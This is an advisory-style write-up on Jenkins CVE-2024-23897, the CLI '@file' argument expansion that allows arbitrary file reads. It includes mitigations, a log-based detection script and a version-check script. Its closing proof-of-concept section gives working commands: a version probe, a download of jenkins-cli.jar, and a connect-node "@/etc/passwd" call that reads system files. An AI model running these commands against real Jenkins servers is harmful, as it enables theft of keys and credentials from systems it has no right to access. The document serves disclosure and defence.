Vendor Description:-
Jenkins is a self-contained, open source automation server which can be used to automate all sorts of tasks related to building, testing, and delivering or deploying software.
Jenkins can be installed through native system packages, Docker, or even run standalone by any machine with a Java Runtime Environment (JRE) installed.
Vulnerability Details:-
Jenkins CVE-2024-23897: Arbitrary File Read Vulnerability Leading to RCE
Jenkins uses the args4j library to parse command arguments and options on the Jenkins controller when processing CLI commands. This command parser has a feature that replaces an @ character followed by a file path in an argument with the file's contents (expandAtFiles). This feature is enabled by default, and Jenkins 2.441 and earlier, LTS 2.426.2 and earlier do not disable it.
This allows attackers to read arbitrary files on the Jenkins controller file system using the default character encoding of the Jenkins controller process.
Attackers with Overall/Read permission can read entire files.
Attackers without Overall/Read permission can read the first few lines of files. The number of lines that can be read depends on available CLI commands. As of the publication of this advisory, the Jenkins security team has found ways to read the first three lines of files in recent releases of Jenkins without having any plugins installed and has not identified any plugins that would increase this line count.
Impact
CVE-2024-23897 is a critical vulnerability in Jenkins, specifically in the command-line interface (CLI). The args4j library’s expandAtFiles method was misused, resulting in this issue. The vulnerability allows unauthorized attackers to view any file on the server, including sensitive binary data such as cryptographic keys. Exploiting this problem may lead to:
- Unauthorized Data Access: Attackers can access essential configuration or private files, risking data confidentiality.
- Service Disruption: CI/CD workflows can be disrupted once the controller is compromised.
- Privilege Escalation: Using accessible files to infiltrate other systems or raise privileges.
Mitigation
To mitigate this vulnerability, companies should implement the following measures:
- Upgrade Jenkins to the most recent version, which includes a patch for this vulnerability. Regular upgrades are crucial to preserving security.
- To restrict CLI access, disable the vulnerable functionality by setting the Java system property hudson.cli.CLICommand.allowAtSyntax=false.
- Alternatively, disable CLI access if not needed for operations.
- Tighten rights: Ensure that only trustworthy users have access to Jenkins, with only the minimum rights required for their responsibilities. Where feasible, disable anonymous access.
- Harden the system configuration and apply input validation where possible to limit what an exploit attempt can reach.
- Use firewalls and monitoring tools to detect unusual CLI activity.
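The last mitigation above asks for monitoring of unusual CLI activity. The script below is an added example (written for this page, not code from the original post or from Jenkins) of what that detection can look like over reverse-proxy access logs in front of a controller. The log lines are constructed for the example. It flags two request types tied to the CLI: downloads of /jnlpJars/jenkins-cli.jar (the path used in the PoC below) and POST requests to /cli, the endpoint the jar talks to in -http mode; a plain GET of /cli/ is only the CLI help page in the web UI and is ignored. A source that both fetches the jar and then drives the CLI endpoint is rated high, since that matches the sequence in the PoC.

```python
import re
from collections import defaultdict

# Constructed sample: access log lines from a reverse proxy in front of a
# Jenkins controller, in Apache/nginx "combined" format. These lines are
# made up for this example; they are not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [24/Jan/2024:10:01:02 +0000] "GET /login HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
203.0.113.7 - - [24/Jan/2024:10:02:15 +0000] "HEAD / HTTP/1.1" 403 0 "-" "curl/8.4.0"
203.0.113.7 - - [24/Jan/2024:10:02:31 +0000] "GET /jnlpJars/jenkins-cli.jar HTTP/1.1" 200 3301000 "-" "Wget/1.21"
203.0.113.7 - - [24/Jan/2024:10:03:05 +0000] "POST /cli?remoting=false HTTP/1.1" 200 512 "-" "Java/17.0.9"
203.0.113.7 - - [24/Jan/2024:10:03:05 +0000] "POST /cli?remoting=false HTTP/1.1" 200 512 "-" "Java/17.0.9"
10.0.0.9 - - [24/Jan/2024:10:04:40 +0000] "GET /cli/ HTTP/1.1" 200 9876 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [timestamp] "METHOD path proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Paths tied to the CLI: the jar download and the HTTP CLI endpoint.
CLI_JAR_PATH = "/jnlpJars/jenkins-cli.jar"
CLI_ENDPOINT = "/cli"


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Label a parsed request as CLI-related, or None for everything else."""
    path = entry["path"].split("?", 1)[0]  # drop a query string such as ?remoting=false
    if path == CLI_JAR_PATH:
        return "cli_jar_download"
    # The HTTP CLI protocol POSTs to /cli; a GET of /cli/ is only the help page in the UI.
    if entry["method"] == "POST" and (path == CLI_ENDPOINT or path.startswith(CLI_ENDPOINT + "/")):
        return "cli_endpoint"
    return None


def flag_cli_activity(log_text, trusted=frozenset()):
    """Summarise CLI-related requests per source address.

    trusted: source addresses (e.g. known automation hosts) to leave out, so
    legitimate CLI use does not drown the report. Returns a list sorted by ip.
    """
    per_ip = defaultdict(lambda: {"cli_jar_download": 0, "cli_endpoint": 0, "user_agents": set()})
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None or entry["ip"] in trusted:
            continue
        kind = classify(entry)
        if kind is None:
            continue
        per_ip[entry["ip"]][kind] += 1
        per_ip[entry["ip"]]["user_agents"].add(entry["ua"])

    findings = []
    for ip, stats in per_ip.items():
        # Jar download followed by CLI endpoint use from one source mirrors the PoC flow.
        severity = "high" if stats["cli_jar_download"] and stats["cli_endpoint"] else "medium"
        findings.append({
            "ip": ip,
            "severity": severity,
            "cli_jar_download": stats["cli_jar_download"],
            "cli_endpoint": stats["cli_endpoint"],
            "user_agents": sorted(stats["user_agents"]),
        })
    return sorted(findings, key=lambda f: f["ip"])


if __name__ == "__main__":
    for finding in flag_cli_activity(SAMPLE_LOG):
        print(finding)
```

Treat this as a starting point rather than a finished rule: legitimate administrators and build automation also download the jar and use /cli, so baseline that traffic first and pass those hosts in `trusted`, and combine the proxy view with the controller's own CLI and audit logging where they are enabled. Disabling the CLI entirely, as the mitigation list suggests, turns any POST to /cli into a clear signal.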
POC
First Check the Jenkins Version Using curl
curl -I http://{ip-addr}:8080

The attacker can continue to exploit the system if the version corresponds to one known to be affected (2.441 and earlier, or LTS 2.426.2 and earlier, as described in the vulnerability details above). The target system in this case is 2.441, making it susceptible.
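The version check above can be automated on the defensive side, for instance when auditing a fleet of controllers. The script below is an added example (not from the original post) that reads the X-Jenkins header from a `curl -I` response and compares the version against the affected ranges given in the Vulnerability Details section (2.441 and earlier, LTS 2.426.2 and earlier), so the first fixed releases are weekly 2.442 and LTS 2.426.3. The header block is constructed for the example; only the X-Jenkins header matters. It goes slightly beyond the page in distinguishing the LTS line (three-component versions such as 2.426.2) from the weekly line (two components such as 2.441), since each has its own fix version.

```python
import re

# Constructed sample of what `curl -I` returns from a Jenkins controller.
# Real controllers send the X-Jenkins header; the other values are made up.
SAMPLE_HEADERS = """\
HTTP/1.1 403 Forbidden
Date: Wed, 24 Jan 2024 10:02:15 GMT
X-Content-Type-Options: nosniff
X-Hudson: 1.395
X-Jenkins: 2.441
X-Jenkins-Session: 0123abcd
Content-Type: text/html;charset=utf-8
"""

# First fixed releases, derived from the affected ranges in the advisory text:
# weekly 2.441 and earlier -> fixed in 2.442; LTS 2.426.2 and earlier -> fixed in 2.426.3.
FIXED_WEEKLY = (2, 442)
FIXED_LTS = (2, 426, 3)


def parse_jenkins_version(headers_text):
    """Return the X-Jenkins header value, or None if the response has none."""
    for line in headers_text.splitlines():
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "x-jenkins":
            return value.strip()
    return None


def version_tuple(version):
    """Turn '2.426.2' into (2, 426, 2); reject anything that is not dotted integers."""
    if not re.fullmatch(r"\d+(\.\d+)*", version):
        raise ValueError(f"unexpected Jenkins version format: {version!r}")
    return tuple(int(part) for part in version.split("."))


def release_line(version):
    """LTS versions carry three components (2.426.2); weekly versions carry two (2.441)."""
    return "LTS" if len(version_tuple(version)) >= 3 else "weekly"


def is_affected(version):
    """True if the version is inside the affected range for CVE-2024-23897."""
    v = version_tuple(version)
    if release_line(version) == "LTS":
        return v < FIXED_LTS
    return v < FIXED_WEEKLY


def assess(headers_text):
    """Combine header parsing and range check into one verdict for a controller."""
    version = parse_jenkins_version(headers_text)
    if version is None:
        return {"version": None, "line": None, "affected": None,
                "note": "no X-Jenkins header; version unknown, check manually"}
    return {"version": version, "line": release_line(version),
            "affected": is_affected(version), "note": ""}


if __name__ == "__main__":
    print(assess(SAMPLE_HEADERS))
```

A missing X-Jenkins header is reported as unknown rather than as safe: a proxy may strip the header, so an absent value is a reason to check the instance another way, not evidence that it is patched.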
Download Jenkins CLI Using wget
Jenkins provides a command-line interface (CLI) that attackers can exploit if left exposed. Attackers can download the jenkins-cli.jar file to interact with the Jenkins instance remotely.
To download the CLI tool:
wget http://{ip-addr}:8080/jnlpJars/jenkins-cli.jar
This command downloads the jenkins-cli.jar file, which attackers will use to execute arbitrary commands on the server.
Alternatively, the jenkins-cli.jar file can be downloaded by opening that URL directly in a browser.

Exploit the RCE via Jenkins CLI
With the CLI tool in hand, the attacker can use it to run remote commands on the vulnerable Jenkins server. An example of a simple exploit involves using the CLI to execute a command that reads files on the system or verifies the current Jenkins user permissions.
In particular, an attacker can exploit the vulnerability to access sensitive system files such as /etc/passwd.
For example:
java -jar jenkins-cli.jar -s http://jenkins-server:8080 -http connect-node "@/etc/passwd"

Reference:
https://www.firecompass.com/jenkins-cve-2024-23897-vulnerability-exposed/
